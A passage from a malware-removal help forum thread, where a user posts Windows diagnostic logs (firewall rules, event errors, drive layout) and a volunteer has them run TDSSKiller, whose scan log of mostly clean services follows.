FirewallRules: [{2AECCC2D-8D5C-4C15-AAD6-87723E8E55F5}] => (Allow) C:\Users\Rainsford\AppData\Local\MyComGames\MyComGames.exe
FirewallRules: [{B8DB63BB-916B-4830-8DA0-6596A96B9A1C}] => (Allow) E:\Steam\SteamApps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{F4D067E2-E3AF-40DC-88C5-1BE99B8BC5FD}] => (Allow) E:\Steam\SteamApps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{5FF4FF90-74EE-4AA1-8326-DAD71A6ACA9E}] => (Allow) E:\Steam\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{47F5B308-F90C-44B6-8F76-8CD8D7BE18AC}] => (Allow) E:\Steam\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [TCP Query User{07742FB7-4FA1-491D-9AFA-D01C5BF900A2}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{513FEF9C-C9AF-4F01-B42A-22EFCFAFA9FE}C:\users\rainsford\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\rainsford\appdata\local\akamai\netsession_win.exe
FirewallRules: [{9C511CE5-0A0E-486C-B199-643EDBF6F7E2}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{ADFBCC64-1EC9-4B0C-AE03-DE894A5C196E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D55B918D-6D36-49D5-8721-28D5C1AE2CA4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{B9927355-8732-4582-AC86-694632994CD9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CDE36FFA-9ACE-4BBE-97A3-0FAC7816C802}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{12F849E2-DA7B-4EB0-AD38-233D5C7EC1CB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{5D185C57-1C01-467C-8054-ADF4B543956B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8FAE24F6-CE34-4FA6-A8BD-A396108F3E28}] => (Allow) E:\Steam\SteamApps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{65372007-E3A4-478F-B2F0-55D6DEB11FE9}] => (Allow) E:\Steam\SteamApps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3BC86F76-CE4F-4159-9F4D-6D2A6FF0C815}] => (Allow) E:\Steam\SteamApps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{BFED839D-5B77-4C7D-9D56-9149718E41EA}] => (Allow) E:\Steam\SteamApps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{06B568BB-5A97-42C1-94D4-7EFA4CC963C9}] => (Allow) D:\Steam\SteamApps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{48FC24B2-B528-45C4-A3CE-25BA583860B1}] => (Allow) D:\Steam\SteamApps\common\Path of Exile\PathOfExileSteam.exe
FirewallRules: [{EC42A553-A749-4321-B2C9-D49CE12B262D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{DF9C3520-2581-4D11-BD1A-61B4D1BBBB3B}] => (Allow) C:\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{E22AB006-1780-4DF3-B28E-913B42BC9600}] => (Allow) C:\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{E311F2F8-2788-4457-B917-527DF6DF7450}] => (Allow) C:\Steam\steamapps\common\Hoard\win32\Reuben.exe
FirewallRules: [{238F453C-A155-4076-A142-A1E2FF1B69DB}] => (Allow) C:\Steam\steamapps\common\Hoard\win32\Reuben.exe
FirewallRules: [{2D58E18E-73F4-47A5-8054-4DC8F2558185}] => (Allow) C:\Steam\steamapps\common\Pixel Piracy\PixelPiracy.exe
FirewallRules: [{55400478-42EB-4180-8825-E17A1E8EB660}] => (Allow) C:\Steam\steamapps\common\Pixel Piracy\PixelPiracy.exe
FirewallRules: [{925FBCB5-E2E4-4946-9A53-DF101EF3473A}] => (Allow) D:\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{BC1B3F46-931A-474C-B9B1-27C3D21DC383}] => (Allow) D:\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{52F5E84A-E439-4834-BC46-12EFF0205451}] => (Allow) LPort=49183
FirewallRules: [{216AF9E2-2698-409D-89F0-8A3F3DB480D5}] => (Allow) LPort=5000

==================== Faulty Device Manager Devices =============

Name: Broadcom NetLink ™ Gigabit Ethernet #2
Description: Broadcom NetLink ™ Gigabit Ethernet
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: k57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Serial ATA Controller
Description: Serial ATA Controller
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/10/2015 07:31:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/09/2015 08:02:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 41.0.1.5750, time stamp: 0x560b37be
Faulting module name: mozglue.dll, version: 41.0.1.5750, time stamp: 0x560b229d
Exception code: 0x80000003
Fault offset: 0x0000ec7f
Faulting process id: 0x1b7c
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3

Error: (10/09/2015 07:38:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.6.305.0, time stamp: 0x53f7bfb6
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeb033f
Exception code: 0xc0000005
Fault offset: 0x00000000000011be
Faulting process id: 0xa8
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3

Error: (10/09/2015 07:31:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/08/2015 01:50:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/07/2015 09:05:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/06/2015 03:02:22 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/05/2015 04:26:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/04/2015 06:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/03/2015 07:26:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (10/10/2015 07:31:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (10/09/2015 09:02:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Antimalware Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Restart the service.

Error: (10/09/2015 08:06:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The PnkBstrA service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%830

    Exception code: 0xc0000005

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%830

    Exception code: 0xc0000005

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:38:53 PM) (Source: Microsoft Antimalware) (EventID: 5008) (User: )
Description: %%860 engine has been terminated due to an unexpected error.

    Failure Type: %%831

    Exception code:

    Resource: file:C:\Program Files (x86)\Glyph\Games\ArcheAge\Beta\game_pak

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:34:25 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/09/2015 07:31:56 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)


==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU X 990 @ 3.47GHz
Percentage of memory in use: 24%
Total physical RAM: 12278.93 MB
Available physical RAM: 9222.74 MB
Total Virtual: 24556.03 MB
Available Virtual: 21328.18 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:922.74 GB) (Free:368.87 GB) NTFS
Drive d: () (Fixed) (Total:74.53 GB) (Free:17.2 GB) NTFS
Drive e: () (Fixed) (Total:298.09 GB) (Free:60.77 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: CB59CF06)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=8.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=922.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: 029A0299)
Partition 1: (Not Active) - (Size=74.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 298.1 GB) (Disk ID: 7BCFC569)
Partition 1: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

 

 

#4 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 11 October 2015 - 06:48 AM

Hi,

Step 1

Please download TDSStdsskiller.pngiller and save it to your Desktop.

  • Start tdsskiller.exe with administrator privileges.
  • Accept the EULA and the KSN Statement.
  • Click on Change parameters. (1)
  • Make sure that all available options (except "Loaded modules") are checked and click OK. (2)
  • Click on Start scan.
  • If any threats are found don't delete them but choose the Skip option for all of them.
  • Click on Report (3) to open the log file. (It is also saved at C:\TDSSKiller.<version_date_time>_log.txt).
    Copy and paste its contents in your next reply.

tdss.gif


Edited by deeprybka, 11 October 2015 - 06:48 AM.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#5 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 11 October 2015 - 09:37 AM

Hello again, here is the report.

 

09:34:22.0454 0x1bb4  TDSS rootkit removing tool 3.1.0.5 Jul 24 2015 12:29:57
09:34:26.0843 0x1bb4  ============================================================
09:34:26.0843 0x1bb4  Current date / time: 2015/10/11 09:34:26.0843
09:34:26.0843 0x1bb4  SystemInfo:
09:34:26.0843 0x1bb4  
09:34:26.0843 0x1bb4  OS Version: 6.1.7601 ServicePack: 1.0
09:34:26.0843 0x1bb4  Product type: Workstation
09:34:26.0843 0x1bb4  ComputerName: PHOTON
09:34:26.0843 0x1bb4  UserName: Rainsford
09:34:26.0843 0x1bb4  Windows directory: C:\Windows
09:34:26.0843 0x1bb4  System windows directory: C:\Windows
09:34:26.0843 0x1bb4  Running under WOW64
09:34:26.0843 0x1bb4  Processor architecture: Intel x64
09:34:26.0843 0x1bb4  Number of processors: 12
09:34:26.0843 0x1bb4  Page size: 0x1000
09:34:26.0843 0x1bb4  Boot type: Normal boot
09:34:26.0843 0x1bb4  ============================================================
09:34:32.0274 0x1bb4  KLMD registered as C:\Windows\system32\drivers\77138243.sys
09:34:33.0105 0x1bb4  System UUID: {02C2AE68-B56E-EE20-53FB-E1A690A1FD30}
09:34:33.0544 0x1bb4  Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0555 0x1bb4  Drive \Device\Harddisk2\DR2 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0565 0x1bb4  Drive \Device\Harddisk1\DR1 - Size: 0x12A1F16000 ( 74.53 Gb ), SectorSize: 0x200, Cylinders: 0x2601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
09:34:33.0568 0x1bb4  ============================================================
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0:
09:34:33.0568 0x1bb4  MBR partitions:
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x14000, BlocksNum 0x1177000
09:34:33.0568 0x1bb4  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x118B000, BlocksNum 0x7357B000
09:34:33.0568 0x1bb4  \Device\Harddisk2\DR2:
09:34:33.0572 0x1bb4  MBR partitions:
09:34:33.0572 0x1bb4  \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x2542D682
09:34:33.0572 0x1bb4  \Device\Harddisk1\DR1:
09:34:33.0572 0x1bb4  MBR partitions:
09:34:33.0572 0x1bb4  \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x950E800
09:34:33.0572 0x1bb4  ============================================================
09:34:33.0610 0x1bb4  C: <-> \Device\Harddisk0\DR0\Partition2
09:34:33.0635 0x1bb4  D: <-> \Device\Harddisk1\DR1\Partition1
09:34:33.0648 0x1bb4  E: <-> \Device\Harddisk2\DR2\Partition1
09:34:33.0648 0x1bb4  ============================================================
09:34:33.0648 0x1bb4  Initialize success
09:34:33.0648 0x1bb4  ============================================================
09:35:02.0856 0x0ff0  ============================================================
09:35:02.0856 0x0ff0  Scan started
09:35:02.0856 0x0ff0  Mode: Manual; SigCheck; TDLFS;
09:35:02.0856 0x0ff0  ============================================================
09:35:02.0856 0x0ff0  KSN ping started
09:35:05.0637 0x0ff0  KSN ping finished: true
09:35:06.0559 0x0ff0  ================ Scan system memory ========================
09:35:06.0559 0x0ff0  System memory - ok
09:35:06.0559 0x0ff0  ================ Scan services =============================
09:35:06.0654 0x0ff0  [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci        C:\Windows\system32\DRIVERS\1394ohci.sys
09:35:06.0719 0x0ff0  1394ohci - ok
09:35:06.0742 0x0ff0  [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI            C:\Windows\system32\drivers\ACPI.sys
09:35:06.0756 0x0ff0  ACPI - ok
09:35:06.0787 0x0ff0  [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
09:35:06.0828 0x0ff0  AcpiPmi - ok
09:35:06.0909 0x0ff0  [ 013697369EAFFA675D0671607F036020, 65611C775AC4681E46A6565E5A7A4FF3363C66EBDC98C4C58AFB365D40BE23B6 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
09:35:06.0931 0x0ff0  AdobeARMservice - ok
09:35:06.0954 0x0ff0  [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx         C:\Windows\system32\drivers\adp94xx.sys
09:35:06.0970 0x0ff0  adp94xx - ok
09:35:06.0992 0x0ff0  [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci         C:\Windows\system32\drivers\adpahci.sys
09:35:07.0007 0x0ff0  adpahci - ok
09:35:07.0022 0x0ff0  [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320         C:\Windows\system32\drivers\adpu320.sys
09:35:07.0034 0x0ff0  adpu320 - ok
09:35:07.0054 0x0ff0  [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
09:35:07.0140 0x0ff0  AeLookupSvc - ok
09:35:07.0210 0x0ff0  [ FA886682CFC5D36718D3E436AACF10B9, F80AB4F91AA6B5C7ECCB000D8E1BC2CF776DC3D69B3D9EBC2558C19035A6B3AB ] AFD             C:\Windows\system32\drivers\afd.sys
09:35:07.0244 0x0ff0  AFD - ok
09:35:07.0254 0x0ff0  [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440          C:\Windows\system32\drivers\agp440.sys
09:35:07.0263 0x0ff0  agp440 - ok
09:35:07.0269 0x0ff0  [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG             C:\Windows\System32\alg.exe
09:35:07.0293 0x0ff0  ALG - ok
09:35:07.0370 0x0ff0  [ 6E3300EC67EDB3485D96E81CED73089A, 6463F088894E07611438F4B330C4EF44BA8137BD849FAAC5B54653B200A52B50 ] AlienFusionService C:\Program Files\Alienware\Command Center\AlienFusionService.exe
09:35:07.0376 0x0ff0  AlienFusionService - ok
09:35:07.0388 0x0ff0  [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide          C:\Windows\system32\drivers\aliide.sys
09:35:07.0396 0x0ff0  aliide - ok
09:35:07.0416 0x0ff0  [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide          C:\Windows\system32\drivers\amdide.sys
09:35:07.0424 0x0ff0  amdide - ok
09:35:07.0434 0x0ff0  [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8           C:\Windows\system32\drivers\amdk8.sys
09:35:07.0449 0x0ff0  AmdK8 - ok
09:35:07.0459 0x0ff0  [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM          C:\Windows\system32\drivers\amdppm.sys
09:35:07.0472 0x0ff0  AmdPPM - ok
09:35:07.0489 0x0ff0  [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
09:35:07.0499 0x0ff0  amdsata - ok
09:35:07.0513 0x0ff0  [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs          C:\Windows\system32\drivers\amdsbs.sys
09:35:07.0525 0x0ff0  amdsbs - ok
09:35:07.0538 0x0ff0  [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata         C:\Windows\system32\drivers\amdxata.sys
09:35:07.0546 0x0ff0  amdxata - ok
09:35:07.0569 0x0ff0  [ 89A69C3F2F319B43379399547526D952, 8ABDB4B8E106F96EBBA0D4D04C4F432296516E107E7BA5644ED2E50CF9BB491A ] AppID           C:\Windows\system32\drivers\appid.sys
09:35:07.0671 0x0ff0  AppID - ok
09:35:07.0696 0x0ff0  [ 0BC381A15355A3982216F7172F545DE1, C33AF13CB218F7BF52E967452573DF2ADD20A95C6BF99229794FEF07C4BBE725 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
09:35:07.0732 0x0ff0  AppIDSvc - ok
09:35:07.0751 0x0ff0  [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] Appinfo         C:\Windows\System32\appinfo.dll
09:35:07.0762 0x0ff0  Appinfo - ok
09:35:07.0790 0x0ff0  [ 4ABA3E75A76195A3E38ED2766C962899, E2001ACD44DA270B8289DA362D26416676301773AB22616C211F31CF2E7869AA ] AppMgmt         C:\Windows\System32\appmgmts.dll
09:35:07.0808 0x0ff0  AppMgmt - ok
09:35:07.0823 0x0ff0  [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc             C:\Windows\system32\drivers\arc.sys
09:35:07.0832 0x0ff0  arc - ok
09:35:07.0844 0x0ff0  [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas          C:\Windows\system32\drivers\arcsas.sys
09:35:07.0854 0x0ff0  arcsas - ok
09:35:07.0939 0x0ff0  [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
09:35:08.0028 0x0ff0  aspnet_state - ok
09:35:08.0061 0x0ff0  [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
09:35:08.0098 0x0ff0  AsyncMac - ok
09:35:08.0107 0x0ff0  [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi           C:\Windows\system32\drivers\atapi.sys
09:35:08.0115 0x0ff0  atapi - ok
09:35:08.0186 0x0ff0  [ DE3E38431B00C2EA247C53675DCF01A0, 8965192096C94203A1F16689DCDA45FE0EDF3A6FB75B70FC378C2008E8E71C9B ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
09:35:08.0258 0x0ff0  AudioEndpointBuilder - ok
09:35:08.0272 0x0ff0  [ DE3E38431B00C2EA247C53675DCF01A0, 8965192096C94203A1F16689DCDA45FE0EDF3A6FB75B70FC378C2008E8E71C9B ] AudioSrv        C:\Windows\System32\Audiosrv.dll
09:35:08.0291 0x0ff0  AudioSrv - ok
09:35:08.0338 0x0ff0  [ 7F95BAB2FB176061B8B7F2DDE003E7D3, 785F878E296585AD0E097D7DC5CFCCF1A8B4AF55F81DC1584931E4FEBA1DEBE6 ] AWOPFilterDriver C:\Windows\system32\drivers\AWOPFilterDriver.sys
09:35:08.0353 0x0ff0  AWOPFilterDriver - ok
09:35:08.0401 0x0ff0  [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV        C:\Windows\System32\AxInstSV.dll
09:35:08.0420 0x0ff0  AxInstSV - ok
09:35:08.0436 0x0ff0  [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv         C:\Windows\system32\drivers\bxvbda.sys
09:35:08.0467 0x0ff0  b06bdrv - ok
09:35:08.0510 0x0ff0  [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a        C:\Windows\system32\DRIVERS\b57nd60a.sys
09:35:08.0540 0x0ff0  b57nd60a - ok
09:35:08.0554 0x0ff0  [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC          C:\Windows\System32\bdesvc.dll
09:35:08.0571 0x0ff0  BDESVC - ok
09:35:08.0585 0x0ff0  [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep            C:\Windows\system32\drivers\Beep.sys
09:35:08.0611 0x0ff0  Beep - ok
09:35:08.0670 0x0ff0  [ B1359701847FF1FF415FA083F1610F48, 991F995B9CF614549F5F7EB5C5B2D47F34EFF0F47B35C4BF4CE716666B9DA1D3 ] BEService       C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
09:35:08.0731 0x0ff0  BEService - detected UnsignedFile.Multi.Generic ( 1 )
09:35:12.0134 0x0ff0  Detect skipped due to KSN trusted
09:35:12.0134 0x0ff0  BEService - ok
09:35:12.0203 0x0ff0  [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE             C:\Windows\System32\bfe.dll
09:35:12.0232 0x0ff0  BFE - ok
09:35:12.0261 0x0ff0  [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS            C:\Windows\System32\qmgr.dll
09:35:12.0321 0x0ff0  BITS - ok
09:35:12.0347 0x0ff0  [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
09:35:12.0364 0x0ff0  blbdrive - ok
09:35:12.0387 0x0ff0  [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
09:35:12.0413 0x0ff0  bowser - ok
09:35:12.0450 0x0ff0  BRDriver64_1_3_3_E02B25FC - ok
09:35:12.0464 0x0ff0  [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo        C:\Windows\system32\drivers\BrFiltLo.sys
09:35:12.0491 0x0ff0  BrFiltLo - ok
09:35:12.0513 0x0ff0  [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp        C:\Windows\system32\drivers\BrFiltUp.sys
09:35:12.0528 0x0ff0  BrFiltUp - ok
09:35:12.0551 0x0ff0  [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser         C:\Windows\System32\browser.dll
09:35:12.0572 0x0ff0  Browser - ok
